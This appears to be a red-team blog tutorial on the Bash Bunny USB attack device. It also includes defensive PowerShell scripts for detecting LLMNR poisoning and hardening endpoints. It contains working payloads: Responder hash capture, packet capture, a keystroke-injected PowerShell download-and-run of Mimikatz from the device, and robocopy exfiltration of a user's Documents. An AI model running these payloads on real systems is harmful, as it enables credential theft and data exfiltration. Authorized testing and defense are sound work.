Bash Bunny: Multi-Vector USB Attacks for Red Team Professionals

Stealthy Solutions | February 22, 2026 | 9 min read
Tags: bash bunny, usb attack, red team, credential harvesting, network tap, hid attack, penetration testing, llmnr poisoning

The USB Rubber Ducky is a keyboard. The Bash Bunny is a computer. While the Ducky executes keystroke sequences, the Bash Bunny runs full Linux payloads — combining multiple USB device classes simultaneously to execute sophisticated multi-stage attacks that no single-function tool can match.

What Is the Bash Bunny?

The Bash Bunny is a USB attack platform manufactured by Hak5. Internally, it runs a full Debian Linux system on an ARM processor. When connected to a target computer, it can simultaneously present as:

  • A USB keyboard (HID)
  • A network adapter (RNDIS/CDC-ECM Ethernet)
  • A USB storage device (Mass Storage)
  • A serial device (CDC-ACM)

This multi-class capability is what separates the Bash Bunny from simpler HID attack tools. A payload can type keystrokes, exfiltrate files over a dedicated network connection, and run a network service — all at the same time.

Hardware Specifications

  • Processor: Cortex-A7 quad-core (Allwinner H3)
  • RAM: 512 MB DDR3
  • Storage: 8 GB flash (expandable via USB)
  • OS: Debian Linux (ARM)
  • Interface: USB 3.0 Type-A
  • Arming mode: Physical switch (position 1, 2, arming)

Attack Modes and Payloads

QuickCreds — Credential Harvesting via LLMNR Poisoning

QuickCreds is arguably the Bash Bunny's signature capability. The attack flow:

  1. Bash Bunny presents as an Ethernet adapter — Windows prioritizes it as the network gateway
  2. Responder starts on the Bash Bunny, listening for LLMNR/NBT-NS/mDNS queries
  3. Windows automatically authenticates to network resources — sending NetNTLMv2 hashes to Responder
  4. Hashes are saved to the Bash Bunny's loot directory

# switch1/payload.txt
ATTACKMODE RNDIS_ETHERNET
LED ATTACK
HOST_IP 172.16.64.1
RESPONDER_OPTIONS "-wrf"
RUN /tools/responder/Responder.py -I usb0 $RESPONDER_OPTIONS
LED FINISH
EXFIL

The entire attack runs in 30-60 seconds. The harvested hashes can be cracked offline with Hashcat or relayed for NTLM relay attacks.
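From the defender's side, the simplest way to tell whether something on the segment is poisoning LLMNR the way QuickCreds does is a canary query: ask LLMNR for a random name that cannot exist and see whether anything answers. The script below is an added example, not code from the original post or from Hak5; it assumes a Windows client with the DnsClient module (Resolve-DnsName and its -LlmnrOnly switch), and the canary naming scheme is a hypothetical one chosen for the example.

```powershell
# Added example, not from the original post: LLMNR poisoner canary for the defending host.
# Assumes a Windows client with the DnsClient module (Resolve-DnsName -LlmnrOnly).
# On a healthy segment nobody answers LLMNR for a random name that does not exist, so any
# answer means something (Responder on a rogue USB adapter, for instance) is poisoning.

function Test-LlmnrPoisoner {
    param(
        [int]$Probes = 3,
        [string]$Prefix = 'canary'   # hypothetical naming scheme for the probe names
    )
    $hits = @()
    for ($i = 0; $i -lt $Probes; $i++) {
        # e.g. canary-8f3a1c: unique each time so a cached answer cannot skew the result
        $name = '{0}-{1}' -f $Prefix, [guid]::NewGuid().ToString('N').Substring(0, 6)
        try {
            $answers = Resolve-DnsName -Name $name -LlmnrOnly -ErrorAction Stop
            foreach ($a in $answers) {
                if ($a.IPAddress) {
                    $hits += [pscustomobject]@{
                        Probe    = $name
                        Answerer = $a.IPAddress
                        Seen     = Get-Date
                    }
                }
            }
        } catch {
            # "DNS name does not exist" is the healthy outcome: nothing answered the probe.
        }
        Start-Sleep -Milliseconds 500
    }
    return ,$hits
}

$findings = Test-LlmnrPoisoner -Probes 5
if ($findings.Count -eq 0) {
    Write-Host 'No LLMNR answers for canary names: no poisoner detected on this segment.'
} else {
    Write-Warning 'LLMNR answers for names that do not exist: possible poisoner.'
    $findings | Format-Table -AutoSize
    # Next step for IR: compare each Answerer with the addresses of the host's own adapters
    # (Get-NetIPAddress); an answer from a freshly attached USB adapter's subnet is the
    # QuickCreds pattern described above.
}
```

Run it on a schedule from a few sentinel workstations rather than once; a poisoner that only runs for the 30-60 seconds the article quotes is easy to miss with a single probe. Once LLMNR is disabled by policy (see Defensive Considerations), the canary will never get an answer from the host's own resolver, and the check becomes a regression test that the policy is still applied.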

Network Tap — Passive Traffic Analysis

Used as a network tap, placed inline between a workstation and its Ethernet connection (or acting as the adapter itself), the Bash Bunny can capture traffic:

ATTACKMODE RNDIS_ETHERNET
LED ATTACK
tcpdump -i usb0 -w /loot/capture.pcap &
sleep 60
LED FINISH
sync

In 60 seconds, you capture all network traffic from the target workstation — DNS queries, authentication attempts, unencrypted HTTP, mDNS broadcasts. This is often more valuable than raw credential capture because it reveals the network architecture and application behavior.

Mimikatz via HID

Combining keyboard injection with the Bash Bunny's Linux environment:

ATTACKMODE HID STORAGE
LED ATTACK
QUACK DELAY 1000
QUACK GUI x
QUACK DELAY 500
QUACK STRING a
QUACK DELAY 1000
QUACK STRING powershell -ep bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('http://172.16.64.1/mimikatz_runner.ps1')"
QUACK ENTER

The Bash Bunny serves the PowerShell script over its own network adapter (172.16.64.1 is the Bash Bunny's default IP), downloads and executes Mimikatz, and retrieves the output.

Exfiltration via Storage

Large-scale data exfiltration using the storage mode:

ATTACKMODE HID STORAGE
QUACK GUI r
QUACK DELAY 500
QUACK STRING cmd /c robocopy "C:\Users\%USERNAME%\Documents" E:\loot\docs /E /NFL /NDL /NJH /NJS /nc /ns /np
QUACK ENTER

The Bash Bunny appears as drive E: — files copy directly to the device.

Payload Development

The Bash Bunny Framework

Payloads are shell scripts placed in /payloads/switch1/ or /payloads/switch2/. The physical switch selects which payload runs.

Key environment variables:

  • $HOST_IP — Bash Bunny's IP on the target network
  • $TARGET_IP — Target's IP address
  • $SWITCH_POSITION — Which switch position is active

LED Status System

LED SETUP         # Magenta - Setup phase
LED ATTACK        # Yellow blink - Attack running
LED STAGE1        # Red blink - Stage 1
LED STAGE2        # Red/Yellow blink - Stage 2
LED FINISH        # Green - Complete
LED FAIL          # Red - Error

WAIT_FOR_ACTIVE_SESSION

A critical timing function:

WAIT_FOR_ACTIVE_SESSION 30

Waits for a user session to be active before executing — ensures the payload runs against a logged-in user rather than at the login screen.

Arming Mode

To modify payloads:

  1. Switch to arming position (position 3)
  2. Connect to computer — Bash Bunny presents as mass storage
  3. Edit files directly on the device
  4. Safely eject
  5. Switch back to attack position

The arming mode also provides shell access (SSH, or the serial console opened here with screen):

screen /dev/ttyACM0 115200

Payload Library

Hak5 maintains an extensive community payload library on GitHub. Categories include:

  • Credential harvesting — QuickCreds, Responder-based attacks
  • Exfiltration — Documents, credentials, SSH keys
  • Persistence — Scheduled tasks, registry modifications
  • Reconnaissance — Network scanning, system enumeration
  • Execution — PowerShell one-liners, DLL injection

Each payload is documented with requirements, target OS, attack duration, and expected output.

Defensive Considerations

For your assessment reports:

  • USB device control policies — Group Policy can restrict USB device class installation
  • LLMNR/NBT-NS disable — Prevents QuickCreds-style hash capture (disable in Group Policy)
  • Network device registration — Endpoint management can detect unauthorized network adapters
  • Physical security — Unattended workstation policy is the root cause defense
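The three technical controls in that list can be audited and, for the first two, applied from a single elevated PowerShell session. The script below is an added example, not code from the original post or from Hak5. It assumes the standard policy-backed registry locations behind the Group Policy settings named in the comments, that the Network adapters device setup class GUID is the documented one, and that Get-PnpDevice and Get-PnpDeviceProperty are available (Windows 8.1 / Server 2012 R2 and later).

```powershell
# Added example, not from the original post or Hak5: audit and harden a Windows endpoint
# against the three technical controls above. Run in an elevated PowerShell session.
# Assumptions: the registry locations are the standard policy-backed keys behind the
# Group Policy settings named in the comments; the Net class GUID is the documented
# "Network adapters" device setup class.

$LlmnrPolicyKey   = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient'
$NetBtInterfaces  = 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces'
$DeviceInstallKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\DeviceInstall\Restrictions'
$NetClassGuid     = '{4d36e972-e325-11ce-bfc1-08002be10318}'

function Disable-Llmnr {
    # Same effect as GPO "Turn off multicast name resolution"
    # (Computer Configuration > Administrative Templates > Network > DNS Client).
    if (-not (Test-Path $LlmnrPolicyKey)) { New-Item -Path $LlmnrPolicyKey -Force | Out-Null }
    Set-ItemProperty -Path $LlmnrPolicyKey -Name EnableMulticastNameResolution -Type DWord -Value 0
}

function Disable-NetBiosOverTcp {
    # NetbiosOptions: 0 = use DHCP setting, 1 = enabled, 2 = disabled. Set per interface GUID;
    # a newly attached interface (such as a USB Ethernet adapter) gets the default, so rerun
    # after hardware changes or push the setting via DHCP option / startup script as well.
    Get-ChildItem -Path $NetBtInterfaces | ForEach-Object {
        Set-ItemProperty -Path $_.PSPath -Name NetbiosOptions -Type DWord -Value 2
    }
}

function Test-LlmnrDisabled {
    $p = Get-ItemProperty -Path $LlmnrPolicyKey -ErrorAction SilentlyContinue
    return ($null -ne $p -and $p.EnableMulticastNameResolution -eq 0)
}

function Test-NetClassInstallBlocked {
    # True when GPO "Prevent installation of devices using drivers that match these device
    # setup classes" is enabled and its list contains the Network adapters class.
    $p = Get-ItemProperty -Path $DeviceInstallKey -ErrorAction SilentlyContinue
    if ($null -eq $p -or $p.DenyDeviceClasses -ne 1) { return $false }
    $listed = Get-ItemProperty -Path "$DeviceInstallKey\DenyDeviceClasses" -ErrorAction SilentlyContinue
    if ($null -eq $listed) { return $false }
    return [bool]($listed.PSObject.Properties.Value -contains $NetClassGuid)
}

function Get-UsbNetworkAdapters {
    # Any network adapter enumerated on the USB bus. A Bash Bunny in RNDIS_ETHERNET mode
    # appears here, normally with "RNDIS" in its friendly name.
    Get-PnpDevice -Class Net -PresentOnly |
        Where-Object { $_.InstanceId -like 'USB\*' } |
        Select-Object FriendlyName, InstanceId, Status
}

function Get-UsbCompositeDevices {
    # Group the interfaces of each composite USB device under their parent device and list
    # the device classes exposed. One device presenting HIDClass and Net at the same time
    # is the multi-vector signature this article describes.
    Get-PnpDevice -PresentOnly |
        Where-Object { $_.InstanceId -like 'USB\VID_*&MI_*' } |
        ForEach-Object {
            $parent = (Get-PnpDeviceProperty -InstanceId $_.InstanceId -KeyName 'DEVPKEY_Device_Parent').Data
            [pscustomobject]@{ Parent = $parent; Class = $_.Class }
        } |
        Group-Object -Property Parent |
        ForEach-Object {
            $classes = @($_.Group.Class | Sort-Object -Unique)
            [pscustomobject]@{
                Device  = $_.Name
                Classes = $classes -join ', '
                Suspect = ($classes -contains 'HIDClass') -and ($classes -contains 'Net')
            }
        }
}

# Audit first, then remediate what is missing.
Write-Host ("LLMNR disabled by policy : {0}" -f (Test-LlmnrDisabled))
Write-Host ("Net class install blocked: {0}" -f (Test-NetClassInstallBlocked))
Get-UsbNetworkAdapters | Format-Table -AutoSize
Get-UsbCompositeDevices | Where-Object Suspect | Format-Table -AutoSize

if (-not (Test-LlmnrDisabled)) { Disable-Llmnr }
Disable-NetBiosOverTcp
```

Two caveats worth carrying into the report. Blocking the Net device setup class outright also blocks legitimate USB docking stations and Ethernet dongles, so most environments prefer an allow-list of approved hardware IDs (the companion "Allow installation of devices that match any of these device IDs" policy) over a class-wide deny. And the composite-device check is a point-in-time inventory; to catch a device that was only plugged in for sixty seconds, forward the Security log's device-recognition events (Event ID 6416, enabled by the "Audit PnP Activity" subcategory) to the SIEM and alert on a single parent device that registers both an HID and a Net interface.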

Conclusion

The Bash Bunny represents the current ceiling of USB attack capability in a commercial tool. Its Linux internals mean any tool that runs on Linux can be a Bash Bunny payload — Nmap, Metasploit, custom Python scripts, and beyond.

In authorized red team engagements, it demonstrates the severity of physical access in a way that's hard to argue with: 60 seconds of USB access, credentials harvested, done.

For authorized penetration testing and red team operations only. Misuse is illegal.